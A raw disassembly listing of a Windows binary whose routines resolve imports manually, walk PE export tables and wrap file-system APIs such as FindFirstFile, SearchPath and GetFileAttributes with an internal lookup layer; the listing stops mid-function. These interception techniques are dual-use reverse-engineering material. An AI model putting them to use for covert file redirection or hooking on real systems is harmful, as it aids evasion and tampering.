cmp [ebp+var_8], 0
jz short loc_4D9E13
push 83h
mov ecx, [ebp+var_8]
call sub_4DB77C
mov [ebp+var_1C], eax
jmp short loc_4D9E17
; ---------------------------------------------------------------------------
loc_4D9E13: ; CODE XREF: sub_4D9DD4+2B�j
and [ebp+var_1C], 0
loc_4D9E17: ; CODE XREF: sub_4D9DD4+3D�j
mov eax, [ebp+var_1C]
mov ds:dword_4E60D4, eax
push 28h
call sub_4D835A
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4D9E3F
push 9
mov ecx, [ebp+var_C]
call sub_4DB77C
mov [ebp+var_20], eax
jmp short loc_4D9E43
; ---------------------------------------------------------------------------
loc_4D9E3F: ; CODE XREF: sub_4D9DD4+5A�j
and [ebp+var_20], 0
loc_4D9E43: ; CODE XREF: sub_4D9DD4+69�j
mov eax, [ebp+var_20]
mov ds:dword_4E60D8, eax
push 28h
call sub_4D835A
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_4D9E6B
push 9
mov ecx, [ebp+var_10]
call sub_4DB77C
mov [ebp+var_24], eax
jmp short loc_4D9E6F
; ---------------------------------------------------------------------------
loc_4D9E6B: ; CODE XREF: sub_4D9DD4+86�j
and [ebp+var_24], 0
loc_4D9E6F: ; CODE XREF: sub_4D9DD4+95�j
mov eax, [ebp+var_24]
mov ds:dword_4E194C, eax
push 28h
call sub_4D835A
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_4D9E97
push 9
mov ecx, [ebp+var_14]
call sub_4DB77C
mov [ebp+var_28], eax
jmp short loc_4D9E9B
; ---------------------------------------------------------------------------
loc_4D9E97: ; CODE XREF: sub_4D9DD4+B2�j
and [ebp+var_28], 0
loc_4D9E9B: ; CODE XREF: sub_4D9DD4+C1�j
mov eax, [ebp+var_28]
mov ds:dword_4E1954, eax
push 28h
call sub_4D835A
pop ecx
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_4D9EC3
push 9
mov ecx, [ebp+var_18]
call sub_4DB77C
mov [ebp+var_2C], eax
jmp short loc_4D9EC7
; ---------------------------------------------------------------------------
loc_4D9EC3: ; CODE XREF: sub_4D9DD4+DE�j
and [ebp+var_2C], 0
loc_4D9EC7: ; CODE XREF: sub_4D9DD4+ED�j
mov eax, [ebp+var_2C]
mov ds:dword_4E1950, eax
push offset dword_4DE5B4
push 2Fh
push offset off_4E1250
call sub_4D9F43
add esp, 0Ch
push offset dword_4DE5C4
push 2
push offset off_4E13C8
call sub_4D9F43
add esp, 0Ch
push offset dword_4DE5D0
push 1
push offset off_4E13D8
call sub_4D9F43
add esp, 0Ch
push offset dword_4DE5DC
push 3
push offset off_4E13E0
call sub_4D9F43
add esp, 0Ch
push offset dword_4DE5F8
push 2
push offset off_4E13F8
call sub_4D9F43
add esp, 0Ch
push offset dword_4DE5B4
call ds:dword_4E1718 ; GetModuleHandleA
mov [ebp+var_4], eax
leave
retn
sub_4D9DD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9F43 proc near ; CODE XREF: sub_4D9DD4+107�p
; sub_4D9DD4+11B�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
and [ebp+var_4], 0
push [ebp+arg_8]
call ds:dword_4E1718 ; GetModuleHandleA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4D9F6B
push [ebp+arg_8]
call ds:dword_4E175C ; LoadLibraryA
mov [ebp+var_10], eax
loc_4D9F6B: ; CODE XREF: sub_4D9F43+1A�j
cmp [ebp+var_10], 0
jnz short loc_4D9F87
push ds:off_4DE4F8
push 0DDh
push ds:off_4DE4FC
call sub_4D848C
loc_4D9F87: ; CODE XREF: sub_4D9F43+2C�j
push 1
push [ebp+var_10]
mov ecx, ds:dword_4E60D8
call sub_4DB98E
mov eax, [ebp+var_10]
and eax, 0FFFh
test eax, eax
jz short loc_4D9FBF
mov eax, [ebp+var_10]
and ax, 0F000h
mov [ebp+var_8], eax
push 1
push [ebp+var_8]
mov ecx, ds:dword_4E60D8
call sub_4DB98E
jmp short loc_4D9FC5
; ---------------------------------------------------------------------------
loc_4D9FBF: ; CODE XREF: sub_4D9F43+5E�j
mov eax, [ebp+var_10]
mov [ebp+var_8], eax
loc_4D9FC5: ; CODE XREF: sub_4D9F43+7A�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_8]
add ecx, [eax+3Ch]
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
cmp dword ptr [eax], 4550h
jnz short loc_4D9FE8
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
add ecx, [eax+78h]
mov [ebp+var_4], ecx
loc_4D9FE8: ; CODE XREF: sub_4D9F43+97�j
and [ebp+var_14], 0
jmp short loc_4D9FF5
; ---------------------------------------------------------------------------
loc_4D9FEE: ; CODE XREF: sub_4D9F43:loc_4DA082�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_4D9FF5: ; CODE XREF: sub_4D9F43+A9�j
mov eax, [ebp+var_14]
cmp eax, [ebp+arg_4]
jnb loc_4DA087
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*8+4]
push [ebp+var_10]
call ds:dword_4E1728 ; GetProcAddress
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_4DA035
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*8]
push eax
push [ebp+var_18]
mov ecx, ds:dword_4E60D4
call sub_4DB98E
loc_4DA035: ; CODE XREF: sub_4D9F43+D8�j
cmp [ebp+var_4], 0
jz short loc_4DA082
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*8+4]
push [ebp+var_4]
push [ebp+var_8]
call sub_4D9C8E
add esp, 0Ch
mov [ebp+var_1C], eax
mov eax, [ebp+var_18]
cmp eax, [ebp+var_1C]
jz short loc_4DA082
cmp [ebp+var_1C], 0
jz short loc_4DA082
cmp [ebp+var_18], 0
jz short loc_4DA082
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*8]
push eax
push [ebp+var_1C]
mov ecx, ds:dword_4E60D4
call sub_4DB98E
loc_4DA082: ; CODE XREF: sub_4D9F43+F6�j
; sub_4D9F43+119�j ...
jmp loc_4D9FEE
; ---------------------------------------------------------------------------
loc_4DA087: ; CODE XREF: sub_4D9F43+B8�j
cmp [ebp+arg_8], offset dword_4DE5B4
jnz short locret_4DA0BA
cmp [ebp+var_4], 0
jz short locret_4DA0BA
push offset aWritefile ; "WriteFile"
push [ebp+var_4]
push [ebp+var_8]
call sub_4D9C8E
add esp, 0Ch
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short locret_4DA0BA
mov eax, [ebp+var_20]
mov ds:dword_4E17BC, eax
locret_4DA0BA: ; CODE XREF: sub_4D9F43+14B�j
; sub_4D9F43+151�j ...
leave
retn
sub_4D9F43 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA0BC proc near ; CODE XREF: _4:004CD715�p
push ebp
mov ebp, esp
push 0
call sub_4DA0C8
pop ebp
retn
sub_4DA0BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA0C8 proc near ; CODE XREF: sub_40B105+478�p
; sub_40B9B9+DF�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEA00
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset dword_4E60B8
call ds:dword_4E16C4 ; RtlEnterCriticalSection
mov ds:byte_4E60D0, 1
push 0
call sub_4D9C54
and [ebp+var_4], 0
call sub_4D71C3
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4DA138
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 1
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4DA134
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_4DA134: ; CODE XREF: sub_4DA0C8+5F�j
or [ebp+var_4], 0FFFFFFFFh
loc_4DA138: ; CODE XREF: sub_4DA0C8+4B�j
mov [ebp+var_4], 2
call sub_4D46D0
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4DA16D
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 3
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4DA169
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_4DA169: ; CODE XREF: sub_4DA0C8+94�j
or [ebp+var_4], 0FFFFFFFFh
loc_4DA16D: ; CODE XREF: sub_4DA0C8+80�j
mov [ebp+var_4], 4
push [ebp+arg_0]
call ds:dword_4E16C8 ; ExitProcess
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4DA1B6
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 5
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4DA1A2
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_4DA1A2: ; CODE XREF: sub_4DA0C8+CD�j
push [ebp+arg_0]
call ds:dword_4E16E4 ; GetCurrentProcess
push eax
call ds:dword_4E1798 ; TerminateProcess
or [ebp+var_4], 0FFFFFFFFh
loc_4DA1B6: ; CODE XREF: sub_4DA0C8+B9�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4DA0C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA1C7 proc near ; CODE XREF: sub_4091C2+22�p
; sub_409BB2+27�p
; DATA XREF: ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push offset dword_4DE5B4
push offset aSearchpatha_0 ; "SearchPathA"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+arg_0], 0
jnz short loc_4DA20D
push 0
xor edx, edx
mov ecx, [ebp+arg_4]
call sub_4D19D2
test eax, eax
jz short loc_4DA20D
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
call ds:dword_4E1708 ; GetFullPathNameA
jmp short locret_4DA222
; ---------------------------------------------------------------------------
loc_4DA20D: ; CODE XREF: sub_4DA1C7+20�j
; sub_4DA1C7+30�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_4]
locret_4DA222: ; CODE XREF: sub_4DA1C7+44�j
leave
retn 18h
sub_4DA1C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA226 proc near ; DATA XREF: _6:004E1360�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEA48
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_1C], 0
and [ebp+var_4], 0
cmp [ebp+arg_0], 0
jnz short loc_4DA296
push 104h
call sub_4D835A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_4]
push 0
push 0
call ds:dword_4E17B8 ; WideCharToMultiByte
loc_4DA296: ; CODE XREF: sub_4DA226+35�j
cmp [ebp+arg_0], 0
jnz short loc_4DA2D3
push 0
xor edx, edx
mov ecx, [ebp+var_20]
call sub_4D19D2
test eax, eax
jz short loc_4DA2D3
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
call ds:dword_4E170C ; GetFullPathNameW
push 0FFFFFFFFh
mov [ebp+var_2C], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4DA323
; ---------------------------------------------------------------------------
loc_4DA2D3: ; CODE XREF: sub_4DA226+74�j
; sub_4DA226+84�j
push offset dword_4DE5B4
push offset aSearchpathw ; "SearchPathW"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_1C], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_1C]
push 0FFFFFFFFh
mov [ebp+var_30], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_4DA323
; ---------------------------------------------------------------------------
loc_4DA311: ; DATA XREF: _5:004DEA50�o
mov eax, [ebp+var_20]
mov [ebp+var_28], eax
push [ebp+var_28]
call sub_4D83DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_4DA323: ; CODE XREF: sub_4DA226+AB�j
; sub_4DA226+E9�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_4DA226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA334 proc near ; CODE XREF: sub_4049CD+201�p
; sub_40752B+3D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4CF63E
test eax, eax
jnz short loc_4DA35A
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E16D0 ; FindFirstFileA
mov [ebp+var_4], eax
loc_4DA35A: ; CODE XREF: sub_4DA334+15�j
mov eax, [ebp+var_4]
leave
retn 8
sub_4DA334 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA361 proc near ; DATA XREF: _6:004E1300�o
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = byte ptr -160h
var_134 = byte ptr -134h
var_30 = byte ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004DA496 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEA58
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 154h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_4D835A
pop ecx
mov [ebp+var_168], eax
mov eax, [ebp+var_168]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4E17B8 ; WideCharToMultiByte
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_160]
push eax
push [ebp+var_20]
call sub_4CF63E
test eax, eax
jnz short loc_4DA416
and [ebp+var_164], 0
push offset dword_4DE5B4
push offset aFindfirstfilew ; "FindFirstFileW"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_164], eax
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_164]
mov [ebp+var_1C], eax
jmp short loc_4DA475
; ---------------------------------------------------------------------------
loc_4DA416: ; CODE XREF: sub_4DA361+84�j
lea ecx, [ebp+var_134]
lea eax, [ebp+var_160]
sub ecx, eax
lea esi, [ebp+var_160]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 104h
mov eax, [ebp+arg_4]
add eax, 2Ch
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_134]
push eax
push 0
push 0
call ds:dword_4E1770 ; MultiByteToWideChar
push 0Eh
mov eax, [ebp+arg_4]
add eax, 234h
push eax
push 0Eh
lea eax, [ebp+var_30]
push eax
push 0
push 0
call ds:dword_4E1770 ; MultiByteToWideChar
loc_4DA475: ; CODE XREF: sub_4DA361+B3�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4DA480
jmp short loc_4DA496
sub_4DA361 endp
; =============== S U B R O U T I N E =======================================
sub_4DA480 proc near ; CODE XREF: sub_4DA361+118�p
; DATA XREF: _5:004DEA60�o
mov eax, [ebp-20h]
mov [ebp-16Ch], eax
push dword ptr [ebp-16Ch]
call sub_4D83DD
pop ecx
retn
sub_4DA480 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4DA361
loc_4DA496: ; CODE XREF: sub_4DA361+11D�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4DA361
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA4AA proc near ; DATA XREF: _6:004E1308�o
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = byte ptr -160h
var_134 = byte ptr -134h
var_30 = byte ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 004DA5EB SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEA68
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 154h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_4D835A
pop ecx
mov [ebp+var_168], eax
mov eax, [ebp+var_168]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4E17B8 ; WideCharToMultiByte
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_160]
push eax
push [ebp+var_20]
call sub_4CF63E
test eax, eax
jnz short loc_4DA56B
and [ebp+var_164], 0
push offset dword_4DE5B4
push offset aFindfirstfilee ; "FindFirstFileExW"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_164], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_164]
mov [ebp+var_1C], eax
jmp short loc_4DA5CA
; ---------------------------------------------------------------------------
loc_4DA56B: ; CODE XREF: sub_4DA4AA+84�j
lea ecx, [ebp+var_134]
lea eax, [ebp+var_160]
sub ecx, eax
lea esi, [ebp+var_160]
mov edi, [ebp+arg_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 104h
mov eax, [ebp+arg_8]
add eax, 2Ch
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_134]
push eax
push 0
push 0
call ds:dword_4E1770 ; MultiByteToWideChar
push 0Eh
mov eax, [ebp+arg_8]
add eax, 234h
push eax
push 0Eh
lea eax, [ebp+var_30]
push eax
push 0
push 0
call ds:dword_4E1770 ; MultiByteToWideChar
loc_4DA5CA: ; CODE XREF: sub_4DA4AA+BF�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4DA5D5
jmp short loc_4DA5EB
sub_4DA4AA endp
; =============== S U B R O U T I N E =======================================
sub_4DA5D5 proc near ; CODE XREF: sub_4DA4AA+124�p
; DATA XREF: _5:004DEA70�o
mov eax, [ebp-20h]
mov [ebp-16Ch], eax
push dword ptr [ebp-16Ch]
call sub_4D83DD
pop ecx
retn
sub_4DA5D5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4DA4AA
loc_4DA5EB: ; CODE XREF: sub_4DA4AA+129�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_4DA4AA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA5FF proc near ; CODE XREF: sub_4049CD+5EC�p
; sub_40752B+C0�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4CF818
test eax, eax
jnz short loc_4DA61F
push [ebp+arg_0]
call ds:dword_4E16CC ; FindClose
mov [ebp+var_4], eax
loc_4DA61F: ; CODE XREF: sub_4DA5FF+12�j
mov eax, [ebp+var_4]
leave
retn 4
sub_4DA5FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA626 proc near ; CODE XREF: sub_4049CD+212�p
; sub_4049CD+5DB�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4CF6DE
test eax, eax
jnz short loc_4DA650
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E16D4 ; FindNextFileA
mov [ebp+var_4], eax
loc_4DA650: ; CODE XREF: sub_4DA626+19�j
mov eax, [ebp+var_4]
leave
retn 8
sub_4DA626 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA657 proc near ; DATA XREF: _6:004E1320�o
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 148h
push esi
push edi
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_144]
push eax
push [ebp+arg_0]
call sub_4CF6DE
test eax, eax
jnz short loc_4DA6A8
and [ebp+var_148], 0
push offset dword_4DE5B4
push offset aFindnextfilew ; "FindNextFileW"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_148], eax
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_148]
mov [ebp+var_4], eax
jmp short loc_4DA707
; ---------------------------------------------------------------------------
loc_4DA6A8: ; CODE XREF: sub_4DA657+20�j
lea ecx, [ebp+var_118]
lea eax, [ebp+var_144]
sub ecx, eax
lea esi, [ebp+var_144]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 104h
mov eax, [ebp+arg_4]
add eax, 2Ch
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_118]
push eax
push 0
push 0
call ds:dword_4E1770 ; MultiByteToWideChar
push 0Eh
mov eax, [ebp+arg_4]
add eax, 234h
push eax
push 0Eh
lea eax, [ebp+var_14]
push eax
push 0
push 0
call ds:dword_4E1770 ; MultiByteToWideChar
loc_4DA707: ; CODE XREF: sub_4DA657+4F�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn 8
sub_4DA657 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA710 proc near ; DATA XREF: _6:004E1390�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D0858
test eax, eax
jnz short loc_4DA73A
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E16FC ; GetFileInformationByHandle
mov [ebp+var_4], eax
loc_4DA73A: ; CODE XREF: sub_4DA710+19�j
mov eax, [ebp+var_4]
leave
retn 8
sub_4DA710 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA741 proc near ; DATA XREF: _6:004E1398�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push [ebp+arg_0]
call sub_4D0950
test eax, eax
jnz short loc_4DA76F
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E1768 ; LockFile
mov [ebp+var_4], eax
jmp short loc_4DA776
; ---------------------------------------------------------------------------
loc_4DA76F: ; CODE XREF: sub_4DA741+12�j
mov [ebp+var_4], 1
loc_4DA776: ; CODE XREF: sub_4DA741+2C�j
mov eax, [ebp+var_4]
leave
retn 14h
sub_4DA741 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA77D proc near ; DATA XREF: _6:004E13A0�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push [ebp+arg_0]
call sub_4D0950
test eax, eax
jnz short loc_4DA7A8
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E179C ; UnlockFile
jmp short locret_4DA7AB
; ---------------------------------------------------------------------------
loc_4DA7A8: ; CODE XREF: sub_4DA77D+12�j
push 1
pop eax
locret_4DA7AB: ; CODE XREF: sub_4DA77D+29�j
leave
retn 14h
sub_4DA77D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA7AF proc near ; CODE XREF: sub_404716+110�p
; sub_409288+10F�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_4D1CA8
test eax, eax
jnz short loc_4DA7CD
push [ebp+arg_0]
call ds:dword_4E16F4 ; GetFileAttributesA
jmp short locret_4DA7D9
; ---------------------------------------------------------------------------
loc_4DA7CD: ; CODE XREF: sub_4DA7AF+11�j
movzx eax, [ebp+var_4]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
locret_4DA7D9: ; CODE XREF: sub_4DA7AF+1C�j
leave
retn 4
sub_4DA7AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA7DD proc near ; DATA XREF: _6:004E1270�o
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004DA896 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEA78
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_4D835A
pop ecx
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4E17B8 ; WideCharToMultiByte
mov [ebp+var_24], eax
cmp [ebp+var_24], 103h
ja short loc_4DA85E
lea edx, [ebp+var_28]
mov ecx, [ebp+var_20]
call sub_4D1CA8
test eax, eax
jnz short loc_4DA86C
loc_4DA85E: ; CODE XREF: sub_4DA7DD+70�j
push [ebp+arg_0]
call ds:dword_4E16F8 ; GetFileAttributesW
mov [ebp+var_1C], eax
jmp short loc_4DA87B
; ---------------------------------------------------------------------------
loc_4DA86C: ; CODE XREF: sub_4DA7DD+7F�j
movzx eax, [ebp+var_28]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
mov [ebp+var_1C], eax
